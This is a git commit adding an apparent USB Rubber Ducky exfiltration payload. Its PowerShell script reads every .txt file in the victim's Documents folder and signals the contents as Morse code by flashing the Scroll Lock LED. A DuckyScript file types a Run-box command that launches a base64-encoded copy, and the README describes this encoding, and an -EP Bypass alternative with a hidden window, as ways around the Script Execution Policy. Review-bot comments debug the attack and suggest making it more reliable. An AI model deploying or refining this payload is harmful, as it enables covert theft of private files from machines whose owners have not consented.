commit
1b8ddc8599
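--- /dev/null
+++ b/MorseCodeFileExfiltration.ps1
@@ -0,0 +1,32 @@
+$o = New-Object -com wscript.shell;
+$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
+$l = '{SCROLLLOCK}';
+function flashy($t){
+$o.SendKeys($l);
+sleep -m ([int]$t);
+$o.SendKeys($l);
+#[console]::beep(600,([int]$t));
+sleep -m 300;
+}
+gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
+$v = $h[[string]$_];
+if ($v)
+{
+$v| % {$_[0..($_.length)]} | % {
+flashy((([int]([string]$_))*100));
+}
+}
+elseif ((!$v) -and !(([int]$_) -eq 32))
+{
+flashy(2700);
+$v = ([string]([int]$_));
+$v| % {$_[0..($_.length)]} | % {
+$h[[string]$_] | % {$_[0..($_.length)]} | % {
+flashy((([int]([string]$_))*100));
+}
+}
+}else{
+sleep -m 1200;
+}
+sleep -m 600;
+}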
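Review bot: Every `$_[0..($_.length)]` slice (the line-to-characters stage after `gc`, and the three code-string slices further down) indexes one element past the end of the string, so each emitted sequence carries a trailing `$null`; in the outer pipeline that `$null` misses `$h`, is not 32, and therefore falls into the ordinal branch where `[int]$null` is 0, meaning every line of every file ends with a spurious 2700 ms pulse followed by the Morse for `0`, while inside the code-string slices the phantom element becomes a zero-duration `flashy(0)` toggle. Replacing each slice with `| % { $_.ToCharArray() } |` (or `0..($_.length-1)`) removes the phantom element; a receiver decoding the current version should expect that trailing `0`. Separately, `gc($_.FullName).ToUpper()` appears to parse as `Get-Content` of the upper-cased path rather than upper-casing the file content, which is masked only because a PowerShell hashtable literal is case-insensitive; writing `(gc $_.FullName).ToUpper()` would make the intent real.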
@ -0,0 +1 @@
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
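--- /dev/null
+++ b/payload.txt
@@ -0,0 +1,60 @@
+REM Title: Morse Code File Exfiltration
+REM Description: Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code
+REM Author: Cribbit
+REM Version: 1.2
+REM Category: Exfiltration
+REM Target: Windows (Powershell 5.1+)
+REM Attackmodes: HID & STORAGE
+REM Note: For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+REM VERSION 1.0
+
+REM Windows fully passive OS Detection and passive Detect Ready
+REM Includes its own passive detect ready. Does not require
+REM additional extensions
+
+REM USAGE:
+REM Extension runs inline (here)
+REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+REM boot delay
+REM $_OS will be set to WINDOWS or NOT_WINDOWS
+
+REM CONFIGURATION:
+DEFINE MAX_WAIT 150
+DEFINE CHECK_INTERVAL 20
+DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+DEFINE NOT_WINDOWS 7
+
+VAR $MAX_TRIES = MAX_WAIT
+WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+DELAY CHECK_INTERVAL
+$MAX_TRIES = ($MAX_TRIES - 1)
+END_WHILE
+IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+$_OS = WINDOWS
+ELSE
+$_OS = NOT_WINDOWS
+END_IF
+
+REM EXAMPLE USAGE AFTER EXTENSION
+REM IF ($_OS == WINDOWS) THEN
+REM STRING HELLO WINDOWS!
+REM ELSE
+REM STRING HELLO WORLD!
+REM END_IF
+END_EXTENSION
+
+
+IF ($_OS == WINDOWS)
+LED_GREEN
+REM Give explorer time to show
+DELAY 2000
+GUI r
+DELAY 200
+STRINGLN powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''DUCKY''').Name+'\b.txt')))
+ELSE
+LED_RED
+END_IF
+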
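Review bot: The one-liner typed into the Run box at the `STRINGLN` line locates b.txt through `(gwmi win32_volume -f 'label=''DUCKY''').Name`; if the STORAGE volume has not been enumerated by the time the fixed 2000 ms delay expires, or its label is not DUCKY, that expression is `$null`, the path collapses to `\b.txt` on the current drive, and the launch aborts with a `Get-Content` error rather than retrying. A short polling loop in the outer command (repeat the `gwmi` query until `.Name` is non-empty before reading the file) or a longer DELAY tied to the PASSIVE_WINDOWS_DETECT result would make the launch deterministic. Unlike the README's alternative invocation, this one passes no `-NoP -W h`, so the console window stays on screen for the whole transmission, which at 100 ms per unit plus 600 ms per character can run for minutes per file. The inner `-encodedCommand` stage reads b.txt, whose contents are not visible in this commit, so whether the outer `.( )` dot-source has anything to invoke after the inner process exits cannot be checked here.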
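--- /dev/null
+++ b/README.md
@@ -0,0 +1,26 @@
+# :flashlight: Morse Code File Exfiltration
+* Author: Cribbit
+* Version: 1.2
+* Target: Windows (Powershell 5.1+)
+* Category: Exfiltration
+* Attackmode: HID & Storage
+
+## :book: Description
+Reads all txt files in "my documents" and flashes the scroll lock on and off to represent Morse code of the English alphanumeric characters (0..9 A..Z)
+For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
+
+## :musical_note: Note
+This is not a very useful payload with limitation of morse code but I thought it was fun to create.
+
+The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing.
+
+Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious.
+
+If you do not want to use the base64 version you could change the payload to:
+`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''DUCKY''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"`
+
+
+## :page_facing_up: Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.2 | Ported from BashBunny Repo |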